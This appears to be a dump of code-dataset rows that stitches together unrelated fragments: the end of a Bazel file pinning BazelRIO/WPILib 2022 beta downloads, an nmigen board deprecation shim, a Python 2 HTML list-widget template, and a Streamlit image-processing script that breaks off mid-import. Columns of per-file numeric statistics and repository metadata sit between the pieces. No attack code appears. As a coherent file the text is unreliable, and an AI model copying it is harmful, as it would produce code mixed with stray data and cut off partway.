sha256 = "ed3a372a0ee57db77f9021f3494e52fdd36afeeb076211d37a4df438a299b3c9",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiliboldcommands_wpiliboldcommands-cpp_linuxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibOldCommands/wpilibOldCommands-cpp/2022.1.1-beta-1/wpilibOldCommands-cpp-2022.1.1-beta-1-linuxx86-64.zip",
sha256 = "4f60f242a3fc52aa409266ba9590c61bf6e4f52c88d2da863ef0d69fa0144de4",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiliboldcommands_wpiliboldcommands-cpp_osxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibOldCommands/wpilibOldCommands-cpp/2022.1.1-beta-1/wpilibOldCommands-cpp-2022.1.1-beta-1-osxx86-64.zip",
sha256 = "66ee7560050f7fd4465642da518d3e05088e5417b3d0fa4f715f14ec25b3b4f1",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiliboldcommands_wpiliboldcommands-cpp_windowsx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibOldCommands/wpilibOldCommands-cpp/2022.1.1-beta-1/wpilibOldCommands-cpp-2022.1.1-beta-1-windowsx86-64static.zip",
sha256 = "4257f7c892132c3253a3dc35afbf12323cd1fc715537278276e1a6db12b1c002",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiliboldcommands_wpiliboldcommands-cpp_linuxx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibOldCommands/wpilibOldCommands-cpp/2022.1.1-beta-1/wpilibOldCommands-cpp-2022.1.1-beta-1-linuxx86-64static.zip",
sha256 = "70276571e289259ebe07fbc68e1747f0623b86770bf847c6af3cdfc71b297478",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiliboldcommands_wpiliboldcommands-cpp_osxx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibOldCommands/wpilibOldCommands-cpp/2022.1.1-beta-1/wpilibOldCommands-cpp-2022.1.1-beta-1-osxx86-64static.zip",
sha256 = "60246184ac373a5d377008f80f9a49f1a1dd973cc7ca820b09af9dad80731d24",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiliboldcommands_wpiliboldcommands-cpp_headers",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibOldCommands/wpilibOldCommands-cpp/2022.1.1-beta-1/wpilibOldCommands-cpp-2022.1.1-beta-1-headers.zip",
sha256 = "9d5ab40d7dce760faaad3798c00844a1d2f1235695266edd5445934a8c3ecf7f",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiliboldcommands_wpiliboldcommands-cpp_sources",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibOldCommands/wpilibOldCommands-cpp/2022.1.1-beta-1/wpilibOldCommands-cpp-2022.1.1-beta-1-sources.zip",
sha256 = "cfb4874270dcefd3bffa021ecbc218ff4f21491665c8ce6dfe68aa3239c8f49d",
build_file_content = cc_library_sources,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibnewcommands_wpilibnewcommands-cpp_linuxathena",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibNewCommands/wpilibNewCommands-cpp/2022.1.1-beta-1/wpilibNewCommands-cpp-2022.1.1-beta-1-linuxathena.zip",
sha256 = "25f8e6c5eeaff7b8131d26b82fb6b7d790e1c69d794bd73397611f575decd9fe",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibnewcommands_wpilibnewcommands-cpp_linuxathenastatic",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibNewCommands/wpilibNewCommands-cpp/2022.1.1-beta-1/wpilibNewCommands-cpp-2022.1.1-beta-1-linuxathenastatic.zip",
sha256 = "eab92c0b8828b775edfc8a56dc12cdfa9c847582ed9093022308fbec1f46b647",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibnewcommands_wpilibnewcommands-cpp_windowsx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibNewCommands/wpilibNewCommands-cpp/2022.1.1-beta-1/wpilibNewCommands-cpp-2022.1.1-beta-1-windowsx86-64.zip",
sha256 = "623ebee022435a80c1d63ed6cc3f4f5086c156863714b924bc789881af5effaf",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibnewcommands_wpilibnewcommands-cpp_linuxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibNewCommands/wpilibNewCommands-cpp/2022.1.1-beta-1/wpilibNewCommands-cpp-2022.1.1-beta-1-linuxx86-64.zip",
sha256 = "67a59105f1e279035197221c4512eb746a92cc830af3eb918ea2e8a48d0d557c",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibnewcommands_wpilibnewcommands-cpp_osxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibNewCommands/wpilibNewCommands-cpp/2022.1.1-beta-1/wpilibNewCommands-cpp-2022.1.1-beta-1-osxx86-64.zip",
sha256 = "22e3d809e7509690c9147f9c43ef8ba4a1acc52ac7b020a46ac96b55fc534f78",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibnewcommands_wpilibnewcommands-cpp_windowsx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibNewCommands/wpilibNewCommands-cpp/2022.1.1-beta-1/wpilibNewCommands-cpp-2022.1.1-beta-1-windowsx86-64static.zip",
sha256 = "fb3deee37a2e9e9157f3ae4fe9631cee54f776081be601e8da8f3dca9ad0e578",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibnewcommands_wpilibnewcommands-cpp_linuxx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibNewCommands/wpilibNewCommands-cpp/2022.1.1-beta-1/wpilibNewCommands-cpp-2022.1.1-beta-1-linuxx86-64static.zip",
sha256 = "f7f3af6846e0ceaa334b9332802c6b02d6e3ecc471f163ec78e53d4a3f1a15e8",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibnewcommands_wpilibnewcommands-cpp_osxx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibNewCommands/wpilibNewCommands-cpp/2022.1.1-beta-1/wpilibNewCommands-cpp-2022.1.1-beta-1-osxx86-64static.zip",
sha256 = "d035191b46d152d1406337394138c989cd1ebcc11eb15ad407ac234ba64d5789",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibnewcommands_wpilibnewcommands-cpp_headers",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibNewCommands/wpilibNewCommands-cpp/2022.1.1-beta-1/wpilibNewCommands-cpp-2022.1.1-beta-1-headers.zip",
sha256 = "136f1a8bfc41e903cb63d20cc03754db505a1ebba6c0e1ab498e31632f28f154",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibnewcommands_wpilibnewcommands-cpp_sources",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibNewCommands/wpilibNewCommands-cpp/2022.1.1-beta-1/wpilibNewCommands-cpp-2022.1.1-beta-1-sources.zip",
sha256 = "13de71a91d7ad1a1c1ed8ae900ddba97f279174c3a82ab5c277cda6eccf2585f",
build_file_content = cc_library_sources,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_halsim_halsim_ds_socket_windowsx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/halsim/halsim_ds_socket/2022.1.1-beta-1/halsim_ds_socket-2022.1.1-beta-1-windowsx86-64.zip",
sha256 = "8b41bd26ca874ff3d6d7d4bf34ae54d6dfe763b0611d6a25d1cdf82db4d65b55",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_halsim_halsim_ds_socket_linuxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/halsim/halsim_ds_socket/2022.1.1-beta-1/halsim_ds_socket-2022.1.1-beta-1-linuxx86-64.zip",
sha256 = "aa8015098b6e3dcb71edf8a3bfb2aab92f1e0360b4045538f15592ead24cf2e6",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_halsim_halsim_ds_socket_osxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/halsim/halsim_ds_socket/2022.1.1-beta-1/halsim_ds_socket-2022.1.1-beta-1-osxx86-64.zip",
sha256 = "dc4a908e576ac0af2ea0ac4147da13ce541ef114b90183823057bab7506e8d8c",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_halsim_halsim_gui_windowsx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/halsim/halsim_gui/2022.1.1-beta-1/halsim_gui-2022.1.1-beta-1-windowsx86-64.zip",
sha256 = "2eea12aeafe46a57589533eedd8693f8e15ec973c68001ec78b14c9744f56fd7",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_halsim_halsim_gui_linuxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/halsim/halsim_gui/2022.1.1-beta-1/halsim_gui-2022.1.1-beta-1-linuxx86-64.zip",
sha256 = "da89913dd83ccaefb65ce3056cecb2ccd6a01cf1b3fbe8ceb868b8eeb2a93e43",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_halsim_halsim_gui_osxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/halsim/halsim_gui/2022.1.1-beta-1/halsim_gui-2022.1.1-beta-1-osxx86-64.zip",
sha256 = "57c6614f08b60a1a1274b293cdf559166b7725b0079b5f3a81c828e65938b52b",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_halsim_halsim_ws_client_windowsx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/halsim/halsim_ws_client/2022.1.1-beta-1/halsim_ws_client-2022.1.1-beta-1-windowsx86-64.zip",
sha256 = "38e14c93b68d118ea1d5ca963ca44d2564ce6a0182c345b6e46a17e033c34cd9",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_halsim_halsim_ws_client_linuxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/halsim/halsim_ws_client/2022.1.1-beta-1/halsim_ws_client-2022.1.1-beta-1-linuxx86-64.zip",
sha256 = "574a865b137ee07259b0320b0b9bb4f173afd14e08c232a98fac67a2e2698c82",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_halsim_halsim_ws_client_osxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/halsim/halsim_ws_client/2022.1.1-beta-1/halsim_ws_client-2022.1.1-beta-1-osxx86-64.zip",
sha256 = "95884c7e85aa2abfce610036a76f18dd29a91e12eef59c6f9dad08ac137aab4d",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_halsim_halsim_ws_server_windowsx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/halsim/halsim_ws_server/2022.1.1-beta-1/halsim_ws_server-2022.1.1-beta-1-windowsx86-64.zip",
sha256 = "a32abc69d6672cdc6ea0c91369aea67db4d1658762d040a5e6fe8e095562e919",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_halsim_halsim_ws_server_linuxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/halsim/halsim_ws_server/2022.1.1-beta-1/halsim_ws_server-2022.1.1-beta-1-linuxx86-64.zip",
sha256 = "04df8fb4270e877569e5fe5e180ab00f7f9b4b9e79007edfb1e7e4a8bc7eb48a",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_halsim_halsim_ws_server_osxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/halsim/halsim_ws_server/2022.1.1-beta-1/halsim_ws_server-2022.1.1-beta-1-osxx86-64.zip",
sha256 = "838d001c5a43d6a1d8e1fd30501879d301d953e8ab9ca1727fcb3b0887ab6e58",
build_file_content = cc_library_shared,
)
maybe(
jvm_maven_import_external,
name = "__bazelrio_edu_wpi_first_shuffleboard_api",
artifact = "edu.wpi.first.shuffleboard:api:2022.1.1-beta-1",
artifact_sha256 = "9c6376870f388fec8888eb0e50c04b3047633c83837132279d665be261a84bc6",
server_urls = ["https://frcmaven.wpi.edu/release"],
)
maybe(
jvm_maven_import_external,
name = "__bazelrio_edu_wpi_first_wpilibj_wpilibj-java",
artifact = "edu.wpi.first.wpilibj:wpilibj-java:2022.1.1-beta-1",
artifact_sha256 = "ef4869b33ad1ec3c1c29b805bf6ac952495ef28f4affd0038f0e8435f4f7e76f",
server_urls = ["https://frcmaven.wpi.edu/release"],
)
maybe(
jvm_maven_import_external,
name = "__bazelrio_edu_wpi_first_hal_hal-java",
artifact = "edu.wpi.first.hal:hal-java:2022.1.1-beta-1",
artifact_sha256 = "dff7d3775ec7c9483a3680b40545b021f57840b71575ae373e28a7dba6f0b696",
server_urls = ["https://frcmaven.wpi.edu/release"],
)
maybe(
jvm_maven_import_external,
name = "__bazelrio_edu_wpi_first_wpiutil_wpiutil-java",
artifact = "edu.wpi.first.wpiutil:wpiutil-java:2022.1.1-beta-1",
artifact_sha256 = "84f951c38694c81d29470b69e76eb3812cc25f50733136ca13ce06a68edea96b",
server_urls = ["https://frcmaven.wpi.edu/release"],
)
maybe(
jvm_maven_import_external,
name = "__bazelrio_edu_wpi_first_ntcore_ntcore-java",
artifact = "edu.wpi.first.ntcore:ntcore-java:2022.1.1-beta-1",
artifact_sha256 = "c06b743e2e12690a0e5c7cf34ade839d46091f5ecad5617c544173baa5bacaa2",
server_urls = ["https://frcmaven.wpi.edu/release"],
)
maybe(
jvm_maven_import_external,
name = "__bazelrio_edu_wpi_first_wpimath_wpimath-java",
artifact = "edu.wpi.first.wpimath:wpimath-java:2022.1.1-beta-1",
artifact_sha256 = "5c5889793fb13bdf2e5381d08ddea6e0cc932d8b401c01d9cb8a03de71a91678",
server_urls = ["https://frcmaven.wpi.edu/release"],
)
maybe(
jvm_maven_import_external,
name = "__bazelrio_edu_wpi_first_cameraserver_cameraserver-java",
artifact = "edu.wpi.first.cameraserver:cameraserver-java:2022.1.1-beta-1",
artifact_sha256 = "31006372443254e750a5effb2e89288e928b6009a2a7675da9ccee874bd8246d",
server_urls = ["https://frcmaven.wpi.edu/release"],
)
maybe(
jvm_maven_import_external,
name = "__bazelrio_edu_wpi_first_cscore_cscore-java",
artifact = "edu.wpi.first.cscore:cscore-java:2022.1.1-beta-1",
artifact_sha256 = "23a0c922dbd6e3a5a7af528afa13d19419aa1d47b808a3ea3b101a1030ad0073",
server_urls = ["https://frcmaven.wpi.edu/release"],
)
maybe(
jvm_maven_import_external,
name = "__bazelrio_edu_wpi_first_wpiliboldcommands_wpiliboldcommands-java",
artifact = "edu.wpi.first.wpilibOldCommands:wpilibOldCommands-java:2022.1.1-beta-1",
artifact_sha256 = "81dea5a894326acca1891473dbc1adec0b66ef94e45778799a566bfe9b7c7f6d",
server_urls = ["https://frcmaven.wpi.edu/release"],
)
maybe(
jvm_maven_import_external,
name = "__bazelrio_edu_wpi_first_wpilibnewcommands_wpilibnewcommands-java",
artifact = "edu.wpi.first.wpilibNewCommands:wpilibNewCommands-java:2022.1.1-beta-1",
artifact_sha256 = "3842455781a71aa340468163e911b166573e966c7d5fbfd46e8091909b96e326",
server_urls = ["https://frcmaven.wpi.edu/release"],
)
maybe(
http_jar,
name = "__bazelrio_edu_wpi_first_tools_smartdashboard_linux64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/tools/SmartDashboard/2022.1.1-beta-1/SmartDashboard-2022.1.1-beta-1-linux64.jar",
sha256 = "fb421832c106f6f9ebe1f33e196245f045da3d98492b3a68cabc93c16099e330",
)
maybe(
http_jar,
name = "__bazelrio_edu_wpi_first_tools_smartdashboard_mac64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/tools/SmartDashboard/2022.1.1-beta-1/SmartDashboard-2022.1.1-beta-1-mac64.jar",
sha256 = "55d6f7981c28e41a79f081918184ad3f238ae99364fc7761de66a122bd32ee47",
)
maybe(
http_jar,
name = "__bazelrio_edu_wpi_first_tools_smartdashboard_win64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/tools/SmartDashboard/2022.1.1-beta-1/SmartDashboard-2022.1.1-beta-1-win64.jar",
sha256 = "afc725e395bb97d71e12ee89aeac22bd3f5afec724e69f24dedd2e8fc8e6622b",
)
maybe(
http_jar,
name = "__bazelrio_edu_wpi_first_tools_pathweaver_linux64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/tools/PathWeaver/2022.1.1-beta-1/PathWeaver-2022.1.1-beta-1-linux64.jar",
sha256 = "e28f067e874772780ce6760b1376a78112cc021ec1eef906e55fe98881fe0d29",
)
maybe(
http_jar,
name = "__bazelrio_edu_wpi_first_tools_pathweaver_mac64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/tools/PathWeaver/2022.1.1-beta-1/PathWeaver-2022.1.1-beta-1-mac64.jar",
sha256 = "33dda4aee5c592ce56504875628553b0c1a69ef3fc6bb51ecff111a363866cda",
)
maybe(
http_jar,
name = "__bazelrio_edu_wpi_first_tools_pathweaver_win64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/tools/PathWeaver/2022.1.1-beta-1/PathWeaver-2022.1.1-beta-1-win64.jar",
sha256 = "6a5058800532570a027de9c70f686223880296974820b736a09889755f9fecc7",
)
maybe(
http_jar,
name = "__bazelrio_edu_wpi_first_tools_robotbuilder",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/tools/RobotBuilder/2022.1.1-beta-1/RobotBuilder-2022.1.1-beta-1.jar",
sha256 = "d431daca5c2c24ddd0a147826b13fb0dfdfc89f3862b9bbda60d0bdecd188e0a",
)
maybe(
http_jar,
name = "__bazelrio_edu_wpi_first_shuffleboard_shuffleboard_linux64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/shuffleboard/shuffleboard/2022.1.1-beta-1/shuffleboard-2022.1.1-beta-1-linux64.jar",
sha256 = "4c2862156bf207c87d5463b54a5745383086712903eb8c0b53b5fa268881b5ed",
)
maybe(
http_jar,
name = "__bazelrio_edu_wpi_first_shuffleboard_shuffleboard_mac64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/shuffleboard/shuffleboard/2022.1.1-beta-1/shuffleboard-2022.1.1-beta-1-mac64.jar",
sha256 = "a28e1b869c9d7baeb4c1775e485147c4fb586b0fbc61da79ecdea93af57b7408",
)
maybe(
http_jar,
name = "__bazelrio_edu_wpi_first_shuffleboard_shuffleboard_win64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/shuffleboard/shuffleboard/2022.1.1-beta-1/shuffleboard-2022.1.1-beta-1-win64.jar",
sha256 = "3271f09fc3f990964a402b47cdc1c08c1219fe01cb59d33fb9742b2e069fbf9c",
)
maybe(
http_archive,
name = "__bazelrio_edu_wpi_first_tools_glass_windowsx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/tools/Glass/2022.1.1-beta-1/Glass-2022.1.1-beta-1-windowsx86-64.zip",
sha256 = "61b5d458f06afb4db00e37182c26899f3cc0d94d7831cb0b6a071dca7bf136c8",
build_file_content = "filegroup(name='all', srcs=glob(['**']), visibility=['//visibility:public'])",
)
maybe(
http_archive,
name = "__bazelrio_edu_wpi_first_tools_glass_linuxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/tools/Glass/2022.1.1-beta-1/Glass-2022.1.1-beta-1-linuxx86-64.zip",
sha256 = "2f0e3deacc8ee86906a2b40d37d11766397103aa8e211bfbcc8adf5803b848bd",
build_file_content = "filegroup(name='all', srcs=glob(['**']), visibility=['//visibility:public'])",
)
maybe(
http_archive,
name = "__bazelrio_edu_wpi_first_tools_glass_osxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/tools/Glass/2022.1.1-beta-1/Glass-2022.1.1-beta-1-osxx86-64.zip",
sha256 = "798928072fb1210984cc4f891567d4595080a0d009c4704065ccb0b054830773",
build_file_content = "filegroup(name='all', srcs=glob(['**']), visibility=['//visibility:public'])",
)
maybe(
http_archive,
name = "__bazelrio_edu_wpi_first_tools_outlineviewer_windowsx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/tools/OutlineViewer/2022.1.1-beta-1/OutlineViewer-2022.1.1-beta-1-windowsx86-64.zip",
sha256 = "b9c80208ce59344b2170f49c37bf69e90c29161921a302398643949614a7d7d7",
build_file_content = "filegroup(name='all', srcs=glob(['**']), visibility=['//visibility:public'])",
)
maybe(
http_archive,
name = "__bazelrio_edu_wpi_first_tools_outlineviewer_linuxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/tools/OutlineViewer/2022.1.1-beta-1/OutlineViewer-2022.1.1-beta-1-linuxx86-64.zip",
sha256 = "99a7a29752d14caab11a0bd6fdb2e0aecf215ea0b5b52da9fa05336902e38c60",
build_file_content = "filegroup(name='all', srcs=glob(['**']), visibility=['//visibility:public'])",
)
maybe(
http_archive,
name = "__bazelrio_edu_wpi_first_tools_outlineviewer_osxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/tools/OutlineViewer/2022.1.1-beta-1/OutlineViewer-2022.1.1-beta-1-osxx86-64.zip",
sha256 = "7d32f193cbbcb692ccfbba3edf582261dc40fed9cdfbde042f71933d84193161",
build_file_content = "filegroup(name='all', srcs=glob(['**']), visibility=['//visibility:public'])",
)
maybe(
http_archive,
name = "__bazelrio_edu_wpi_first_tools_sysid_windowsx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/tools/SysId/2022.1.1-beta-1/SysId-2022.1.1-beta-1-windowsx86-64.zip",
sha256 = "4b417e19c18b38cc2d887db45ccdcc0511a1c9dc7b03146cb3d693e36abde912",
build_file_content = "filegroup(name='all', srcs=glob(['**']), visibility=['//visibility:public'])",
)
maybe(
http_archive,
name = "__bazelrio_edu_wpi_first_tools_sysid_linuxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/tools/SysId/2022.1.1-beta-1/SysId-2022.1.1-beta-1-linuxx86-64.zip",
sha256 = "7d2eaebb9d465a58fa1684538508dd693431b7759462a6a445ab44655caadd8b",
build_file_content = "filegroup(name='all', srcs=glob(['**']), visibility=['//visibility:public'])",
)
maybe(
http_archive,
name = "__bazelrio_edu_wpi_first_tools_sysid_osxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/tools/SysId/2022.1.1-beta-1/SysId-2022.1.1-beta-1-osxx86-64.zip",
sha256 = "001ed38d1aa29828a717cfb5a041e3d5ed899cc3bd4ba38bac965f19bc0e221b",
build_file_content = "filegroup(name='all', srcs=glob(['**']), visibility=['//visibility:public'])",
)
| 56.525164
| 181
| 0.730741
| 5,977
| 51,664
| 6.02794
| 0.03664
| 0.043632
| 0.079991
| 0.070221
| 0.761886
| 0.758445
| 0.743984
| 0.739765
| 0.727858
| 0.696189
| 0
| 0.18397
| 0.154305
| 51,664
| 913
| 182
| 56.587076
| 0.640644
| 0
| 0
| 0.419956
| 0
| 0.142544
| 0.654847
| 0.335282
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001096
| true
| 0
| 0.012061
| 0
| 0.013158
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ca9b0b948b70d0bda767a3df0e889421a12fdde7
| 247
|
py
|
Python
|
nmigen_boards/tinyfpga_ax2.py
|
lethalbit/nmigen-boards
|
aaf18252e457ff95257137da2a629820c0ff2bfa
|
[
"BSD-2-Clause"
] | 11
|
2021-12-10T12:23:29.000Z
|
2022-03-13T08:40:20.000Z
|
nmigen_boards/tinyfpga_ax2.py
|
lethalbit/nmigen-boards
|
aaf18252e457ff95257137da2a629820c0ff2bfa
|
[
"BSD-2-Clause"
] | 12
|
2021-12-11T18:51:29.000Z
|
2022-03-12T05:08:52.000Z
|
nmigen_boards/tinyfpga_ax2.py
|
lethalbit/nmigen-boards
|
aaf18252e457ff95257137da2a629820c0ff2bfa
|
[
"BSD-2-Clause"
] | 7
|
2021-12-12T07:20:21.000Z
|
2022-03-06T06:20:55.000Z
|
from amaranth_boards.tinyfpga_ax2 import *
from amaranth_boards.tinyfpga_ax2 import __all__
import warnings
warnings.warn("instead of nmigen_boards.tinyfpga_ax2, use amaranth_boards.tinyfpga_ax2",
DeprecationWarning, stacklevel=2)
| 30.875
| 88
| 0.809717
| 31
| 247
| 6.064516
| 0.516129
| 0.297872
| 0.361702
| 0.398936
| 0.37234
| 0.37234
| 0
| 0
| 0
| 0
| 0
| 0.023364
| 0.133603
| 247
| 7
| 89
| 35.285714
| 0.85514
| 0
| 0
| 0
| 0
| 0
| 0.287449
| 0.222672
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
04d31e8f536442e92780af8d5182bfae3e811a3b
| 1,349
|
py
|
Python
|
user/vistas/widgets/list-2colums.py
|
ZerpaTechnology/occoa
|
a8c0bd2657bc058801a883109c0ec0d608d04ccc
|
[
"Apache-2.0"
] | null | null | null |
user/vistas/widgets/list-2colums.py
|
ZerpaTechnology/occoa
|
a8c0bd2657bc058801a883109c0ec0d608d04ccc
|
[
"Apache-2.0"
] | null | null | null |
user/vistas/widgets/list-2colums.py
|
ZerpaTechnology/occoa
|
a8c0bd2657bc058801a883109c0ec0d608d04ccc
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
doc+=''''''
data["widget"]={}
data["widget"]["list"]=[{"href":"#","titulo":"Praesent vestibulum molestie"},
{"href":"#","titulo":"Praesent vestibulum molestie"},
{"href":"#","titulo":"Praesent vestibulum molestie"},
{"href":"#","titulo":"Praesent vestibulum molestie"},
]
doc+='''<div class="row off4"> <div class="grid_3"> <ul class="marked-list wow fadeInRight"> '''
k=0
doc+=''' '''
while k< (len(data["widget"]["list"])/2):
doc+=""" <li><a href='"""
try: doc+=str(data["widget"]["list"][k]["href"])
except Exception, e: doc+=str(e)
doc+="""'>"""
try: doc+=str(data["widget"]["list"][k]["titulo"])
except Exception, e: doc+=str(e)
doc+='''</a></li> '''
k+=1
doc+=''' '''
pass
doc+=''' </ul> </div> <div class="grid_3"> <ul data-wow-delay="0.2s" class="marked-list wow fadeInRight"> '''
while k< len(data["widget"]["list"]):
doc+=""" <li><a href='"""
try: doc+=str(data["widget"]["list"][k]["href"])
except Exception, e: doc+=str(e)
doc+="""'>"""
try: doc+=str(data["widget"]["list"][k]["titulo"])
except Exception, e: doc+=str(e)
doc+='''</a></li> '''
k+=1
doc+=''' '''
pass
doc+=''' </ul> </div></div>'''
| 36.459459
| 132
| 0.48258
| 165
| 1,349
| 3.933333
| 0.248485
| 0.123267
| 0.151002
| 0.172573
| 0.864407
| 0.733436
| 0.662558
| 0.662558
| 0.662558
| 0.662558
| 0
| 0.009497
| 0.219422
| 1,349
| 37
| 133
| 36.459459
| 0.606838
| 0.028169
| 0
| 0.735294
| 0
| 0.058824
| 0.442748
| 0.016031
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.058824
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
b6d3b7e5e1a72cf4537c824789afd671243af2de
| 97,709
|
py
|
Python
|
pages/basic_image_processing_operations.py
|
jjaramillo34/demo-image-processing
|
2ab0dd37092265f1efacc21aef457f3f6752ddaa
|
[
"MIT"
] | null | null | null |
pages/basic_image_processing_operations.py
|
jjaramillo34/demo-image-processing
|
2ab0dd37092265f1efacc21aef457f3f6752ddaa
|
[
"MIT"
] | null | null | null |
pages/basic_image_processing_operations.py
|
jjaramillo34/demo-image-processing
|
2ab0dd37092265f1efacc21aef457f3f6752ddaa
|
[
"MIT"
] | null | null | null |
from ast import Not
from lib2to3.pytree import convert
from trace import CoverageResults
from pandas import options
import streamlit as st
import cv2 as cv
import numpy as np
import string
import random
from io import BytesIO
import requests
import shutil
import imutils
import streamlit.components.v1 as components
from datetime import datetime
from streamlit_cropper import st_cropper
from webcolors import hex_to_name
from PIL import Image, ImageColor
from matplotlib import pyplot as plt
from utils_helpers import (
auto_canny_thresh,
